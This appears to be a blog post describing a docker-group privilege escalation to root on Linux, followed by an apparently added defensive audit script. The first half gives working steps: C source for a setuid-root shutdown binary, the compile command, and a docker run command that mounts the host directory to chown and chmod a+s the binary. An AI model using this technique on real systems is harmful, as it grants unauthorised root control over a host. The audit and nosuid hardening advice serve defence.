I was amazed at how easy this was. I found a couple of different websites that led me to this; giving credit where credit is due:
1. http://yatb.giacomodrago.com/en/post/10/shutdown-linux-system-from-within-php-script.html
2. http://reventlov.com/advisories/using-the-docker-command-to-root-the-host
So, putting 1 and 2 together: I have my docker install running as the “docker” user, so no “sudo” is required. All I did (as docker) is:
1. Create the following snippet of C code, shutdown_setuid.c:
docker $> vi shutdown_setuid.c
#include <stdlib.h>
#include <unistd.h>

int main() {
    /* Switch to uid 0; this only works once the binary is owned by root and setuid (step 3). */
    setuid(0);
    system("/sbin/shutdown -h now"); /* change this to the actual location of shutdown */
    return 0;
}
2. Compile it:
docker $> gcc -o shutdown_setuid shutdown_setuid.c
3. Exploit docker to mount the current directory, set shutdown_setuid to be owned by root, and turn on the setuid permissions:
docker $> docker run -v $PWD:/stuff -t dockerdev/rhel /bin/bash -c 'chown root.root /stuff/shutdown_setuid && chmod a+s /stuff/shutdown_setuid'
4. docker $> ls -la shutdown_setuid
-rwsrwsr-x. 1 root root 6623 May 29 11:54 shutdown_setuid
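
From the defender's side, the two things worth auditing after reading the steps above are who can talk to the docker daemon without sudo and whether setuid/setgid files like the one in the `ls` output have appeared in user-writable directories. The script below is an added example, not part of the original post; the function names (`group_members`, `find_setid_files`, `audit`) are hypothetical, and it assumes a Linux host with `awk`, `find` and a `stat` that supports `-c`.

```shell
#!/bin/sh
# Added audit example; not code from the original post.

# Print the supplementary members of a group, one per line.
# $1 = group name, $2 = group file (default /etc/group).
# Assumption: local accounts only. Reading the file directly misses
# LDAP/SSSD users and users whose primary group is the one queried.
group_members() {
    awk -F: -v g="$1" '
        $1 == g && $4 != "" {
            n = split($4, m, ",")
            for (i = 1; i <= n; i++) print m[i]
        }' "${2:-/etc/group}"
}

# List setuid or setgid regular files under a directory as "mode uid path".
# -xdev keeps the scan on one filesystem; uid 0 in the output means a
# root-owned file that runs with root privileges for whoever executes it.
find_setid_files() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) \
        -exec stat -c '%a %u %n' {} +
}

# Report docker group membership, then scan each directory given.
audit() {
    echo "Members of group 'docker' (root-equivalent on this host):"
    group_members docker | sed 's/^/  /'
    for dir in "$@"; do
        echo "setuid/setgid files under $dir (mode uid path):"
        find_setid_files "$dir" | sed 's/^/  /'
    done
}

# Run the audit only when directories are passed, e.g.: sh audit.sh /home /tmp
[ "$#" -eq 0 ] || audit "$@"
```

Mounting user-writable filesystems such as /home and /tmp with the `nosuid` option makes the kernel ignore the setuid bit on files stored there, which blunts this particular trick but does not change the fact that docker access is root-equivalent.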